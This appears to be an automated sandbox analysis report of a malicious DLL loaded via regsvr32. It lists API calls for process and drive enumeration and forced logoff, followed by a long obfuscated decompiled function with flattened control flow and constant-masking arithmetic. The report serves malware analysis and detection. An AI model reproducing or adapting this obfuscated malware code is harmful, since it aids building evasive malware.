                                                                                                                0x1000f58a
                                                                                                                0x1000f590
                                                                                                                0x1000f594
                                                                                                                0x1000f598
                                                                                                                0x1000f59e
                                                                                                                0x1000f5a3
                                                                                                                0x1000f5a6
                                                                                                                0x1000f5ae
                                                                                                                0x1000f5b4
                                                                                                                0x1000f5bb
                                                                                                                0x1000f5bf
                                                                                                                0x1000f5c5
                                                                                                                0x1000f5c5
                                                                                                                0x1000f5cb
                                                                                                                0x1000f5ce
                                                                                                                0x1000f5dc
                                                                                                                0x1000f5e0
                                                                                                                0x1000f5e3
                                                                                                                0x1000f5e7
                                                                                                                0x1000f5ed
                                                                                                                0x1000f5ed
                                                                                                                0x1000f5ef
                                                                                                                0x1000f5fa
                                                                                                                0x1000f600
                                                                                                                0x1000f604
                                                                                                                0x1000f607
                                                                                                                0x1000f609
                                                                                                                0x1000f60c
                                                                                                                0x1000f60e
                                                                                                                0x1000f612
                                                                                                                0x1000f612
                                                                                                                0x1000f614
                                                                                                                0x1000f61b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1000f61b
                                                                                                                0x1000f543
                                                                                                                0x1000f446
                                                                                                                0x00000000
                                                                                                                0x1000f439
                                                                                                                0x1000f638
                                                                                                                0x1000f63d
                                                                                                                0x00000000
                                                                                                                0x1000f63d
                                                                                                                0x1000f402
                                                                                                                0x1000fdf9
                                                                                                                0x1000fe02
                                                                                                                0x1000fe0a
                                                                                                                0x1000fe0b
                                                                                                                0x1000fe0d
                                                                                                                0x1000fe22

                                                                                                                APIs
                                                                                                                  • Part of subcall function 1000CD90: _memset.LIBCMT ref: 1000CE18
                                                                                                                  • Part of subcall function 1000CD90: EnumProcesses.PSAPI(?,00001000,?,?,00000000,00000103), ref: 1000CE2F
                                                                                                                  • Part of subcall function 1000CD90: OpenProcess.KERNEL32(00000410,00000000,?,?,00001000,?,?,00000000,00000103), ref: 1000CE57
                                                                                                                  • Part of subcall function 1000CD90: EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 1000CE74
                                                                                                                  • Part of subcall function 1000CD90: GetModuleFileNameExA.PSAPI(00000000,?,?,00000104,00000000,?,00000004,?), ref: 1000CE8C
                                                                                                                  • Part of subcall function 1000CD90: GetShortPathNameA.KERNEL32 ref: 1000CEA1
                                                                                                                  • Part of subcall function 1000CD90: __itoa.LIBCMT ref: 1000CEB2
                                                                                                                • GetLogicalDriveStringsA.KERNEL32 ref: 1000F651
                                                                                                                • GetLogicalDriveStringsA.KERNEL32 ref: 1000F665
                                                                                                                • GetLogicalDriveStringsA.KERNEL32 ref: 1000F700
                                                                                                                • GetLogicalDriveStringsA.KERNEL32 ref: 1000F714
                                                                                                                • GetDriveTypeA.KERNEL32(00000000), ref: 1000F741
                                                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000032), ref: 1000F9CC
                                                                                                                • GetSystemDirectoryA.KERNEL32(?,00000032), ref: 1000F9DC
                                                                                                                • _strcspn.LIBCMT ref: 1000FA11
                                                                                                                • TerminateThread.KERNEL32(?,00000000,Error in Fun_mycomputer,00000000,00000000), ref: 1000FB6F
                                                                                                                • SendMessageA.USER32 ref: 1000FB8E
                                                                                                                • ExitWindowsEx.USER32(00000008,00000000), ref: 1000FDCE
                                                                                                                  • Part of subcall function 1001D2C4: IsWindow.USER32(?), ref: 1001D2D3
                                                                                                                  • Part of subcall function 1003BD06: __mbscmp_l.LIBCMT ref: 1003BD10
                                                                                                                  • Part of subcall function 10026562: SendMessageA.USER32 ref: 100265A4
                                                                                                                  • Part of subcall function 1002637C: SendMessageA.USER32 ref: 1002639D
                                                                                                                  • Part of subcall function 1001D2C4: SetWindowTextA.USER32(?,10056948), ref: 1001D2FB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Drive$LogicalStrings$MessageSend$DirectoryEnumNameProcessWindowWindows$ExitFileModuleModulesOpenPathProcessesShortSystemTerminateTextThreadType__itoa__mbscmp_l_memset_strcspn
                                                                                                                • String ID: C:\Documents and Settings$Error in Fun_mycomputer$Setting\ScanSet.dat
                                                                                                                • API String ID: 2231300009-416981898
                                                                                                                • Opcode ID: 889f6e5dc4e3b898d58a28561b8f14dd400949fdfbb0250285c8566fe9270b8e
                                                                                                                • Instruction ID: 17fef6c9e4aa31712d7f858396377a431d7250849e06f074a95ef21add98d0df
                                                                                                                • Opcode Fuzzy Hash: 889f6e5dc4e3b898d58a28561b8f14dd400949fdfbb0250285c8566fe9270b8e
                                                                                                                • Instruction Fuzzy Hash: D442B1752043429FE314CB64CC91FAAB3E6FF88354F14862CF5598B2A6DBB1E905CB52
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001AED0A Relevance: 23.3, Strings: 18, Instructions: 791COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E001AED0A(intOrPtr __ecx) {
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				void* _v56;
				intOrPtr _v60;
				char* _v64;
				intOrPtr _v68;
				signed int _v72;
				intOrPtr _v76;
				signed int _v80;
				char _v84;
				intOrPtr _v88;
				char _v92;
				char _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				void* _t951;
				intOrPtr _t957;
				void* _t959;
				intOrPtr* _t963;
				void* _t965;
				intOrPtr _t975;
				intOrPtr* _t977;
				intOrPtr _t978;
				void* _t979;
				signed int _t981;
				char _t984;
				void* _t993;
				void* _t1001;
				signed int _t1007;
				signed int _t1008;
				signed int _t1009;
				signed int _t1010;
				signed int _t1011;
				signed int _t1012;
				signed int _t1013;
				signed int _t1014;
				signed int _t1015;
				signed int _t1016;
				signed int _t1017;
				signed int _t1018;
				signed int _t1019;
				signed int _t1020;
				signed int _t1021;
				signed int _t1022;
				signed int _t1023;
				signed int _t1024;
				void* _t1025;
				intOrPtr* _t1027;
				intOrPtr _t1034;
				intOrPtr _t1038;
				void* _t1092;
				void* _t1112;
				intOrPtr _t1113;
				signed int _t1115;
				void* _t1116;
				void* _t1121;
				signed int* _t1123;
				signed int* _t1125;
				void* _t1129;

				_t1123 =  &_v480;
				_v60 = 0x5d4ddc;
				_v88 = __ecx;
				asm("stosd");
				_t1007 = 0x6e;
				_t1121 = 0;
				_t1001 = 0xbffd8ba;
				asm("stosd");
				asm("stosd");
				_v176 = 0xd043b1;
				_v176 = _v176 + 0xffff436a;
				_v176 = _v176 ^ 0x4d8dc350;
				_v168 = 0xc99c0a;
				_v168 = _v168 << 6;
				_v168 = _v168 ^ 0x32670281;
				_v476 = 0x7ced5d;
				_v476 = _v476 + 0xffff2e37;
				_v476 = _v476 << 0xc;
				_v476 = _v476 << 0xc;
				_v476 = _v476 ^ 0x94000000;
				_v324 = 0x91447a;
				_v324 = _v324 + 0xffff8cf5;
				_v324 = _v324 + 0xe16;
				_v324 = _v324 ^ 0x0090df85;
				_v400 = 0xe2f84b;
				_v400 = _v400 << 2;
				_v400 = _v400 + 0x366e;
				_v400 = _v400 ^ 0xfbbc9bf3;
				_v400 = _v400 ^ 0xf8308c69;
				_v180 = 0xe91a4c;
				_v180 = _v180 >> 0xc;
				_v180 = _v180 ^ 0x00000e91;
				_v164 = 0xd525ca;
				_v164 = _v164 | 0x2c0ea990;
				_v164 = _v164 ^ 0x2cdfadda;
				_v404 = 0x8846c8;
				_v404 = _v404 >> 9;
				_v404 = _v404 << 6;
				_v404 = _v404 + 0xffffc86d;
				_v404 = _v404 ^ 0x0010d12d;
				_v336 = 0x591427;
				_v336 = _v336 >> 6;
				_v336 = _v336 << 0x10;
				_v336 = _v336 ^ 0x64500000;
				_v160 = 0x79c4ed;
				_v160 = _v160 | 0x1e4dadd9;
				_v160 = _v160 ^ 0x1e7dedfd;
				_v248 = 0xec7fd;
				_v248 = _v248 + 0x518b;
				_v248 = _v248 << 0xa;
				_v248 = _v248 ^ 0x3c662000;
				_v216 = 0x61443b;
				_v216 = _v216 ^ 0x0096bce8;
				_v216 = _v216 * 0x75;
				_v216 = _v216 ^ 0x7154b86f;
				_v296 = 0x4047f1;
				_v296 = _v296 * 0x2f;
				_v296 = _v296 ^ 0xed45e741;
				_v296 = _v296 ^ 0xe688d25e;
				_v352 = 0x365006;
				_v352 = _v352 / _t1007;
				_v352 = _v352 << 0xf;
				_v352 = _v352 + 0xa8f;
				_v352 = _v352 ^ 0x3f3a20c1;
				_v332 = 0x93ab4e;
				_v332 = _v332 | 0x93144e68;
				_v332 = _v332 * 0x43;
				_v332 = _v332 ^ 0xa0c00c4f;
				_v208 = 0x3814c1;
				_v208 = _v208 + 0xffff197c;
				_v208 = _v208 >> 1;
				_v208 = _v208 ^ 0x001733e1;
				_v212 = 0xaca34;
				_t1008 = 0x27;
				_v212 = _v212 / _t1008;
				_v212 = _v212 + 0xffffc3ba;
				_v212 = _v212 ^ 0x00011649;
				_v464 = 0x43125f;
				_v464 = _v464 << 4;
				_v464 = _v464 << 5;
				_v464 = _v464 ^ 0xf64e0625;
				_v464 = _v464 ^ 0x7065ed17;
				_v408 = 0xcbf812;
				_v408 = _v408 >> 0x10;
				_t1009 = 0x77;
				_t1115 = 0x2a;
				_v408 = _v408 * 0x5f;
				_v408 = _v408 / _t1009;
				_v408 = _v408 ^ 0x00039cfc;
				_v268 = 0x64c4e6;
				_v268 = _v268 / _t1115;
				_v268 = _v268 + 0xffff705c;
				_v268 = _v268 ^ 0x0009cf5d;
				_v472 = 0x30b635;
				_v472 = _v472 ^ 0x932c22dd;
				_v472 = _v472 ^ 0x56aeccfb;
				_v472 = _v472 ^ 0x58e8dcc7;
				_v472 = _v472 ^ 0x9d551c53;
				_v196 = 0xe31e25;
				_v196 = _v196 + 0xffff7e32;
				_v196 = _v196 ^ 0x00e67d09;
				_v204 = 0x1a3cb1;
				_t1010 = 0x4e;
				_v204 = _v204 / _t1010;
				_v204 = _v204 ^ 0x000ef299;
				_v456 = 0xad6771;
				_v456 = _v456 << 0xa;
				_v456 = _v456 ^ 0x3184b4d0;
				_t1011 = 0x28;
				_v456 = _v456 / _t1011;
				_v456 = _v456 ^ 0x0342ef82;
				_v376 = 0x12b73a;
				_v376 = _v376 + 0x4203;
				_v376 = _v376 | 0xa9996942;
				_v376 = _v376 + 0x1bf4;
				_v376 = _v376 ^ 0xa9990fb9;
				_v440 = 0xadd022;
				_t1012 = 0x7c;
				_v440 = _v440 / _t1012;
				_v440 = _v440 >> 1;
				_t1013 = 0x35;
				_v440 = _v440 / _t1013;
				_v440 = _v440 ^ 0x0005e3da;
				_v236 = 0xf2a551;
				_v236 = _v236 + 0xda65;
				_t1014 = 3;
				_v236 = _v236 / _t1014;
				_v236 = _v236 ^ 0x00517dee;
				_v360 = 0x16b23;
				_v360 = _v360 << 0xb;
				_v360 = _v360 + 0x38c6;
				_v360 = _v360 ^ 0x0881e02d;
				_v360 = _v360 ^ 0x03dc2185;
				_v448 = 0x15384a;
				_t1015 = 0x3b;
				_v448 = _v448 * 0x26;
				_v448 = _v448 / _t1015;
				_v448 = _v448 >> 0xa;
				_v448 = _v448 ^ 0x000f2b31;
				_v432 = 0x475ebe;
				_v432 = _v432 << 0xc;
				_v432 = _v432 ^ 0x2de4ca71;
				_v432 = _v432 >> 0xa;
				_v432 = _v432 ^ 0x0017183f;
				_v132 = 0x7c50fb;
				_v132 = _v132 + 0x2686;
				_v132 = _v132 ^ 0x0071b144;
				_v316 = 0xda1159;
				_v316 = _v316 ^ 0x7bc4016e;
				_v316 = _v316 + 0xffff5d47;
				_v316 = _v316 ^ 0x7b1ea9ce;
				_v392 = 0xea3029;
				_v392 = _v392 << 3;
				_v392 = _v392 << 4;
				_v392 = _v392 << 6;
				_v392 = _v392 ^ 0x4605501f;
				_v188 = 0x81dcb0;
				_v188 = _v188 << 1;
				_v188 = _v188 ^ 0x01054126;
				_v384 = 0xe1d29d;
				_t1016 = 0x7d;
				_v384 = _v384 / _t1016;
				_v384 = _v384 << 1;
				_v384 = _v384 * 0x11;
				_v384 = _v384 ^ 0x003cd7a5;
				_v424 = 0x4ff69;
				_v424 = _v424 >> 4;
				_v424 = _v424 >> 4;
				_v424 = _v424 + 0x2fc0;
				_v424 = _v424 ^ 0x000e73a3;
				_v368 = 0x83687d;
				_v368 = _v368 >> 9;
				_v368 = _v368 << 9;
				_v368 = _v368 << 2;
				_v368 = _v368 ^ 0x020a12e7;
				_v480 = 0xb20df;
				_v480 = _v480 ^ 0xe5e5b578;
				_v480 = _v480 | 0xb0ea231f;
				_v480 = _v480 ^ 0x1f4cc622;
				_v480 = _v480 ^ 0xeaa5fda9;
				_v416 = 0xdb5857;
				_v416 = _v416 + 0xffff5d0e;
				_v416 = _v416 >> 0xf;
				_v416 = _v416 * 0x1e;
				_v416 = _v416 ^ 0x0009eba5;
				_v308 = 0x3690ba;
				_v308 = _v308 * 0x4d;
				_v308 = _v308 | 0x3dd138d0;
				_v308 = _v308 ^ 0x3df04435;
				_v260 = 0xcc31d2;
				_t1017 = 0xd;
				_v260 = _v260 * 0x51;
				_v260 = _v260 / _t1017;
				_v260 = _v260 ^ 0x04fb72da;
				_v300 = 0x4a247d;
				_v300 = _v300 >> 0xa;
				_v300 = _v300 + 0x5084;
				_v300 = _v300 ^ 0x0000ef03;
				_v460 = 0x94273c;
				_v460 = _v460 + 0xffffe108;
				_v460 = _v460 + 0xa0c2;
				_v460 = _v460 | 0x5b8fe8c2;
				_v460 = _v460 ^ 0x5b9a2571;
				_v220 = 0x462d02;
				_v220 = _v220 + 0xffff69d9;
				_t1018 = 0x36;
				_v220 = _v220 / _t1018;
				_v220 = _v220 ^ 0x000f711e;
				_v468 = 0x7d5a38;
				_v468 = _v468 << 0x10;
				_v468 = _v468 + 0xffff9669;
				_v468 = _v468 << 0xc;
				_v468 = _v468 ^ 0x79678ae9;
				_v100 = 0xe0249c;
				_v100 = _v100 << 0xf;
				_v100 = _v100 ^ 0x1247e62f;
				_v172 = 0xf6d9fe;
				_t1019 = 0x4f;
				_v172 = _v172 / _t1019;
				_v172 = _v172 ^ 0x00004bf0;
				_v292 = 0x91fc75;
				_v292 = _v292 + 0xffffab0d;
				_v292 = _v292 + 0x90d;
				_v292 = _v292 ^ 0x0090e8ed;
				_v124 = 0xd703b7;
				_v124 = _v124 >> 8;
				_v124 = _v124 ^ 0x0009399a;
				_v252 = 0xfa091e;
				_t1020 = 0x2e;
				_v252 = _v252 * 6;
				_v252 = _v252 + 0x2994;
				_v252 = _v252 ^ 0x05d90a1d;
				_v108 = 0xdaad96;
				_v108 = _v108 / _t1020;
				_v108 = _v108 ^ 0x0001c1a8;
				_v436 = 0x91be2c;
				_v436 = _v436 ^ 0x0c1c9158;
				_v436 = _v436 + 0xffffde1f;
				_v436 = _v436 + 0xffff5077;
				_v436 = _v436 ^ 0x0c8253ce;
				_v104 = 0x9f6bcc;
				_v104 = _v104 << 0xe;
				_v104 = _v104 ^ 0xdaf7a407;
				_v444 = 0x85ba2d;
				_v444 = _v444 + 0xffff79b0;
				_v444 = _v444 * 0x68;
				_v444 = _v444 << 1;
				_v444 = _v444 ^ 0x6c30bf58;
				_v452 = 0xadaed;
				_v452 = _v452 << 9;
				_v452 = _v452 ^ 0xd8d8b7e4;
				_v452 = _v452 << 5;
				_v452 = _v452 ^ 0xada01a1c;
				_v412 = 0xfcf3aa;
				_v412 = _v412 << 5;
				_v412 = _v412 >> 0xf;
				_t1021 = 0x5a;
				_v412 = _v412 / _t1021;
				_v412 = _v412 ^ 0x0008a868;
				_v156 = 0xd148e0;
				_t1022 = 0x32;
				_v156 = _v156 * 0x63;
				_v156 = _v156 ^ 0x50eeb8aa;
				_v420 = 0x3adc07;
				_v420 = _v420 | 0xac1614d0;
				_v420 = _v420 ^ 0x49c14ce5;
				_v420 = _v420 >> 0xe;
				_v420 = _v420 ^ 0x000ed7ad;
				_v428 = 0xf083ed;
				_v428 = _v428 / _t1022;
				_v428 = _v428 + 0xffffa306;
				_v428 = _v428 | 0x324b1735;
				_v428 = _v428 ^ 0x3248f5c0;
				_v200 = 0xf0edb;
				_v200 = _v200 * 0x76;
				_v200 = _v200 ^ 0x06ff5ce1;
				_v116 = 0xe17701;
				_v116 = _v116 ^ 0x73071077;
				_v116 = _v116 ^ 0x73e83ced;
				_v140 = 0xe22e64;
				_v140 = _v140 ^ 0x45e74181;
				_v140 = _v140 ^ 0x450029a9;
				_v284 = 0x4a0946;
				_v284 = _v284 / _t1115;
				_v284 = _v284 ^ 0x0826a2c0;
				_v284 = _v284 ^ 0x0828fcba;
				_v344 = 0x8fc99c;
				_v344 = _v344 ^ 0x9451be15;
				_v344 = _v344 + 0x391b;
				_v344 = _v344 ^ 0x94d52540;
				_v276 = 0x63cece;
				_v276 = _v276 | 0xf7d78752;
				_v276 = _v276 * 0x6d;
				_v276 = _v276 ^ 0x9481d3ca;
				_v396 = 0x80226a;
				_v396 = _v396 | 0xff9de7ff;
				_v396 = _v396 ^ 0xff9353a4;
				_v244 = 0x145c83;
				_v244 = _v244 >> 0xd;
				_v244 = _v244 ^ 0x4b8835f2;
				_v244 = _v244 ^ 0x4b8afe44;
				_v192 = 0xc93bfb;
				_v192 = _v192 * 0x29;
				_v192 = _v192 ^ 0x20315894;
				_v184 = 0xe9f304;
				_v184 = _v184 >> 8;
				_v184 = _v184 ^ 0x000503fd;
				_v320 = 0xec550;
				_v320 = _v320 + 0xffff7159;
				_v320 = _v320 * 0xf;
				_v320 = _v320 ^ 0x00d867c3;
				_v328 = 0x18a9c;
				_v328 = _v328 | 0x8e7fb7df;
				_v328 = _v328 ^ 0x8e7efec0;
				_v388 = 0x12a0d8;
				_v388 = _v388 >> 4;
				_t1023 = 0x33;
				_v388 = _v388 * 0x32;
				_v388 = _v388 * 0x24;
				_v388 = _v388 ^ 0x082cdd2f;
				_v120 = 0x4e930;
				_v120 = _v120 | 0x63948bd2;
				_v120 = _v120 ^ 0x63942f96;
				_v148 = 0xdd016e;
				_v148 = _v148 ^ 0x208ce98d;
				_v148 = _v148 ^ 0x20594f04;
				_v112 = 0x3bb12e;
				_v112 = _v112 * 0x30;
				_v112 = _v112 ^ 0x0b341126;
				_v228 = 0x46e126;
				_v228 = _v228 ^ 0xaf065162;
				_v228 = _v228 << 5;
				_v228 = _v228 ^ 0xe815acce;
				_v304 = 0x1c406f;
				_v304 = _v304 / _t1023;
				_v304 = _v304 << 2;
				_v304 = _v304 ^ 0x0007e3c5;
				_v372 = 0xe04ae2;
				_v372 = _v372 | 0x7670b066;
				_v372 = _v372 << 0xb;
				_v372 = _v372 + 0x3a24;
				_v372 = _v372 ^ 0x87d77805;
				_v380 = 0x27e18e;
				_t1024 = 6;
				_v380 = _v380 / _t1024;
				_v380 = _v380 ^ 0x8c3979ce;
				_v380 = _v380 + 0x3fff;
				_v380 = _v380 ^ 0x8c4bf016;
				_v312 = 0xfd3f6c;
				_v312 = _v312 << 0x10;
				_v312 = _v312 + 0x73d4;
				_v312 = _v312 ^ 0x3f640e1b;
				_v356 = 0x79a710;
				_v356 = _v356 ^ 0x5f97fd28;
				_v356 = _v356 << 0xb;
				_v356 = _v356 << 0xf;
				_v356 = _v356 ^ 0xe002f938;
				_v256 = 0x359a90;
				_v256 = _v256 << 4;
				_v256 = _v256 | 0x42bdba1a;
				_v256 = _v256 ^ 0x43f2672f;
				_v264 = 0xc40429;
				_v264 = _v264 + 0xffff3e34;
				_v264 = _v264 + 0x4c31;
				_v264 = _v264 ^ 0x00cc0edc;
				_v272 = 0x3adb11;
				_v272 = _v272 + 0x7fbb;
				_v272 = _v272 + 0xffff8c4e;
				_v272 = _v272 ^ 0x00395894;
				_v364 = 0xede62e;
				_v364 = _v364 << 5;
				_v364 = _v364 << 0xc;
				_v364 = _v364 + 0xffff6bd8;
				_v364 = _v364 ^ 0xcc5c8588;
				_v280 = 0xe2350e;
				_v280 = _v280 | 0xe7ac37db;
				_v280 = _v280 ^ 0xce4fc911;
				_v280 = _v280 ^ 0x29ae3a29;
				_v288 = 0x4fc091;
				_v288 = _v288 * 9;
				_v288 = _v288 ^ 0xfa91f215;
				_v288 = _v288 ^ 0xf850816a;
				_v144 = 0x98e9a9;
				_t1116 = 0xb28fc88;
				_v144 = _v144 | 0x2af3608c;
				_t1112 = 0xf04754f;
				_v144 = _v144 ^ 0x2af0cf38;
				_v152 = 0xade2a0;
				_v152 = _v152 | 0xfc137e07;
				_v152 = _v152 ^ 0xfcb42ea1;
				_v232 = 0x80e6ba;
				_v232 = _v232 * 0xc;
				_v232 = _v232 + 0x1df0;
				_v232 = _v232 ^ 0x06061ec5;
				_v240 = 0x84ee6f;
				_v240 = _v240 << 5;
				_v240 = _v240 >> 0xd;
				_v240 = _v240 ^ 0x0009062a;
				_v224 = 0x167e33;
				_v224 = _v224 * 0x30;
				_v224 = _v224 | 0x16acd527;
				_v224 = _v224 ^ 0x16b9a344;
				_v136 = 0x313d01;
				_v136 = _v136 << 5;
				_v136 = _v136 ^ 0x06279659;
				_v340 = 0x41df81;
				_v340 = _v340 + 0xffff731b;
				_v340 = _v340 + 0xb41d;
				_v340 = _v340 ^ 0x004da8cd;
				_v348 = 0x6a4f76;
				_v348 = _v348 + 0xdd31;
				_v348 = _v348 | 0x2de81ddb;
				_v348 = _v348 >> 7;
				_v348 = _v348 ^ 0x0052e3c0;
				_v128 = 0x11561f;
				_v128 = _v128 + 0xfffff1c2;
				_v128 = _v128 ^ 0x0011926e;
				while(1) {
					L1:
					_t1025 = 0x6dd4c8c;
					_t951 = 0x3695613;
					_t1092 = 0x1eb2293;
					do {
						L2:
						_t1129 = _t1001 - _t1116;
						if(_t1129 > 0) {
							__eflags = _t1001 - 0xbffd8ba;
							if(__eflags == 0) {
								_t1001 = 0x9b7527f;
								goto L23;
							} else {
								__eflags = _t1001 - _t1112;
								if(_t1001 == _t1112) {
									E001B2519(_v340, _v96, _v348, _v216, _v128);
								} else {
									__eflags = _t1001 - 0xf4be280;
									if(__eflags != 0) {
										goto L23;
									} else {
										_t963 =  *0x1c4208; // 0x0
										E001B17D2(_v224, _v136,  *_t963);
										_t1001 = _t1112;
										goto L1;
									}
								}
							}
						} else {
							if(_t1129 == 0) {
								_push(_v312);
								_push(0x1a15e4);
								_push(_v380);
								_t1117 = E001BF5D9(_v304, _v372, __eflags);
								_v44 = _v176;
								_v40 = _v168;
								_v36 = _v296;
								_t957 =  *0x1c4208; // 0x0
								_t1027 =  *0x1c4208; // 0x0
								_t874 = _t1027 + 0x1c; // 0x1c
								_t959 = E001BA42C(_v356, _v256,  *_t1027, _t874, _v304, _v264, _v272, _v304, _v364,  *((intOrPtr*)(_t957 + 4)), _v280, _v288, _t952,  &_v44, _v96, _v160);
								_t1125 =  &(_t1123[0x11]);
								__eflags = _t959 - _v248;
								if(_t959 != _v248) {
									_t1001 = 0xf4be280;
								} else {
									_t1001 = _t1112;
									_t1121 = 1;
								}
								E001BF94B(_t1117, _v144, _v152, _v232, _v240);
								_t1123 =  &(_t1125[3]);
								goto L17;
							} else {
								if(_t1001 == _t1092) {
									_push(_v284);
									_push(0x1a14e4);
									_push(_v140);
									_t965 = E001BF5D9(_v200, _v116, __eflags);
									_t1034 =  *0x1c4208; // 0x0
									__eflags = E001AEB4B(_t1034 + 4, _v344, _v276, _v396, _v244, _v192,  &_v92, _v404, _t965, _v96) - _v336;
									_t1001 =  ==  ? 0x3695613 : _t1112;
									E001BF94B(_t965, _v184, _v320, _v328, _v388);
									_t1123 =  &(_t1123[0xf]);
									goto L17;
								} else {
									if(_t1001 == _t951) {
										_t975 =  *0x1c4208; // 0x0
										_push(_t1025);
										_t1038 = E001A303A(_t1025,  *((intOrPtr*)(_t975 + 4)));
										_t1123 =  &(_t1123[3]);
										_t977 =  *0x1c4208; // 0x0
										__eflags = _t1038;
										_t1001 =  !=  ? _t1116 : _t1112;
										 *_t977 = _t1038;
										while(1) {
											L1:
											_t1025 = 0x6dd4c8c;
											_t951 = 0x3695613;
											_t1092 = 0x1eb2293;
											goto L2;
										}
									} else {
										if(_t1001 == _t1025) {
											_push(_v368);
											_push(0x1a1574);
											_push(_v424);
											_t978 = E001BF5D9(_v188, _v384, __eflags);
											_push(_v260);
											_t1113 = _t978;
											_push(0x1a15a4);
											_push(_v308);
											_t979 = E001BF5D9(_v480, _v416, __eflags);
											_v80 = _v476;
											_t981 = E001B0184(_v300, _v460, _t1113, _v220, _v468);
											_v72 = _v72 & 0x00000000;
											_v76 = _t1113;
											_v68 = 1;
											_v84 = 2 + _t981 * 2;
											_v64 =  &_v84;
											_t984 = 0x20;
											_v92 = _t984;
											__eflags = E001A7A69(_v100, _v172, _t979, _v88,  &_v92, _v292,  &_v72,  &_v32, _v124, _v180, _t984, _v252, _v108) - _v164;
											_t1001 =  ==  ? 0x1eb2293 : 0xf04754f;
											E001BF94B(_t1113, _v436, _v104, _v444, _v452);
											E001BF94B(_t979, _v412, _v156, _v420, _v428);
											_t1123 =  &(_t1123[0x1a]);
											goto L9;
										} else {
											_t1133 = _t1001 - 0x9b7527f;
											if(_t1001 == 0x9b7527f) {
												_push(_v212);
												_push(0x1a15c4);
												_push(_v208);
												_t993 = E001BF5D9(_v352, _v332, _t1133);
												_push(_v472);
												_push(0x1a1504);
												_push(_v268);
												E001AD2C9(_t993, _v324, _v196, _v204,  &_v96, _v456, _v376, E001BF5D9(_v464, _v408, _t1133));
												_t1001 =  ==  ? 0x6dd4c8c : 0xbb7c7e4;
												E001BF94B(_t993, _v440, _v236, _v360, _v448);
												E001BF94B(_t994, _v432, _v132, _v316, _v392);
												_t1123 =  &(_t1123[0x12]);
												L9:
												_t1112 = 0xf04754f;
												L17:
												_t1116 = 0xb28fc88;
												_t951 = 0x3695613;
												_t1025 = 0x6dd4c8c;
												_t1092 = 0x1eb2293;
											}
										}
										goto L23;
									}
								}
							}
						}
						L26:
						return _t1121;
						L23:
					} while (_t1001 != 0xbb7c7e4);
					goto L26;
				}
			}






























































































































































                                                                                                                0x001aed0a
                                                                                                                0x001aed10
                                                                                                                0x001aed28
                                                                                                                0x001aed2f
                                                                                                                0x001aed34
                                                                                                                0x001aed35
                                                                                                                0x001aed37
                                                                                                                0x001aed3c
                                                                                                                0x001aed3d
                                                                                                                0x001aed3e
                                                                                                                0x001aed49
                                                                                                                0x001aed54
                                                                                                                0x001aed5f
                                                                                                                0x001aed6a
                                                                                                                0x001aed72
                                                                                                                0x001aed7d
                                                                                                                0x001aed85
                                                                                                                0x001aed8d
                                                                                                                0x001aed92
                                                                                                                0x001aed97
                                                                                                                0x001aed9f
                                                                                                                0x001aedaa
                                                                                                                0x001aedb5
                                                                                                                0x001aedc0
                                                                                                                0x001aedcb
                                                                                                                0x001aedd3
                                                                                                                0x001aedd8
                                                                                                                0x001aede0
                                                                                                                0x001aede8
                                                                                                                0x001aedf0
                                                                                                                0x001aedfb
                                                                                                                0x001aee03
                                                                                                                0x001aee0e
                                                                                                                0x001aee19
                                                                                                                0x001aee24
                                                                                                                0x001aee2f
                                                                                                                0x001aee37
                                                                                                                0x001aee3c
                                                                                                                0x001aee41
                                                                                                                0x001aee49
                                                                                                                0x001aee51
                                                                                                                0x001aee5c
                                                                                                                0x001aee64
                                                                                                                0x001aee6c
                                                                                                                0x001aee77
                                                                                                                0x001aee82
                                                                                                                0x001aee8d
                                                                                                                0x001aee98
